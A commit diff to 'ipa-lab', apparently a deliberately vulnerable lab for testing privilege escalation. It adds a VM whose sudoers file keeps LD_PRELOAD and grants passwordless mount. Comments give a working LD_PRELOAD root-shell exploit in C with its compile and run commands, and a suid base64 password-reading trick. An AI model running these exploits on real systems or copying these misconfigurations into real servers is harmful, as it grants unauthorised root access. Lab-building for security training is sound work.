ipa-lab
diff --git a/‎Vagrantfile‎
Lines changed: 1 addition & 1 deletion b/‎Vagrantfile‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎create_and_start_vms.sh‎
Lines changed: 1 addition & 1 deletion b/‎create_and_start_vms.sh‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎hints.json‎
Lines changed: 2 additions & 1 deletion b/‎hints.json‎
Lines changed: 2 additions & 1 deletion
diff --git a/‎hosts.ini‎
Lines changed: 6 additions & 1 deletion b/‎hosts.ini‎
Lines changed: 6 additions & 1 deletion
diff --git a/‎tasks.yaml‎
Lines changed: 43 additions & 1 deletion b/‎tasks.yaml‎
Lines changed: 43 additions & 1 deletion
@@ -44,7 +44,7 @@ Vagrant.configure("2") do |config|
   #  ansible.playbook = "./../tasks.yaml"
   #end
 
-  (1..14).each do |i|
+  (1..15).each do |i|
       config.vm.define "test-#{i}" do |node|
          node.vm.network "private_network", ip: "192.168.122.#{i+150}"
          node.vm.hostname = "test-#{i}"
 
@@ -7,7 +7,7 @@ vagrant up
 gawk -i inplace '!/^192.168.122./' ~/.ssh/known_hosts
 
 # check if we can connect to the different machines
-for i in $(seq 1 14); do
+for i in $(seq 1 15); do
 	ip=$((150+$i))
 	hostname=$(ssh root@192.168.122.$ip hostname)
 
 
@@ -12,5 +12,6 @@
 	"test-11" : "it looks like there is a periodic backup script in the home directory.",
 	"test-12" : "it looks like the backup directory is periodically saved away.",
 	"test-13" : "there might be some exploitable suid binary on the system.",
-	"test-14" : "root's password might be in a protected file"
+	"test-14" : "root's password might be in a protected file",
+	"test-15" : "LD_PRELOAD might be enabled"
 }
@@ -12,6 +12,7 @@
 192.168.122.162
 192.168.122.163
 192.168.122.164
+192.168.122.165
 
 # those are mostly file-based (suid/sudo)
 
@@ -63,4 +64,8 @@
 
 # root read privileges over suid
 [vuln_suid_read_privileges]
-192.168.122.164
+192.168.122.164
+
+# LD_PRELOAD is kept on sudo calls
+[vuln_ld_preload]
+192.168.122.165
@@ -284,4 +284,46 @@
 
     - name: set the suid bit for base64
       command: chmod u+s /usr/bin/base64
-      # base64 root_password | base64 -d; su
+      # base64 root_password | base64 -d; su
+
+- name: LD_PRELOAD enabled on sudo calls
+  hosts: vuln_ld_preload
+  gather_facts: true
+  remote_user: root
+  tasks:
+    - name: install gcc
+      apt:
+        name: gcc
+        state: present
+
+    - name: allow LD_PRELOAD in sudo
+      lineinfile:
+        path: /etc/sudoers
+        line: 'Defaults    env_keep += "LD_PRELOAD"'
+        state: present
+        validate: '/usr/sbin/visudo -cf %s'
+
+    - name: allow lowpriv to execute sudo mount
+      lineinfile:
+        path: /etc/sudoers
+        line: 'lowpriv ALL=(ALL) NOPASSWD: /bin/mount /dev/sdb1 /mnt/usb'
+        state: present
+        validate: '/usr/sbin/visudo -cf %s'
+
+    - name: allow lowpriv to execute sudo umount
+      lineinfile:
+        path: /etc/sudoers
+        line: 'lowpriv ALL=(ALL) NOPASSWD: /bin/umount /mnt/usb'
+        state: present
+        validate: '/usr/sbin/visudo -cf %s'
+        # nano exploit.c
+        # #include <unistd.h>
+        # #include <stdlib.h>
+        # void _init() {
+        #   unsetenv("LD_PRELOAD");
+        #   setgid(0);
+        #   setuid(0);
+        #   system("/bin/bash");
+        # }
+        # gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
+        # sudo LD_PRELOAD=$PWD/exploit.so /bin/mount /dev/sdb1 /mnt/usb
Original file line number	Diff line number	Diff line change
`@@ -12,5 +12,6 @@`
`12`	`12`	`"test-11" : "it looks like there is a periodic backup script in the home directory.",`
`13`	`13`	`"test-12" : "it looks like the backup directory is periodically saved away.",`
`14`	`14`	`"test-13" : "there might be some exploitable suid binary on the system.",`
`15`		`- "test-14" : "root's password might be in a protected file"`
	`15`	`+ "test-14" : "root's password might be in a protected file",`
	`16`	`+ "test-15" : "LD_PRELOAD might be enabled"`
`16`	`17`	`}`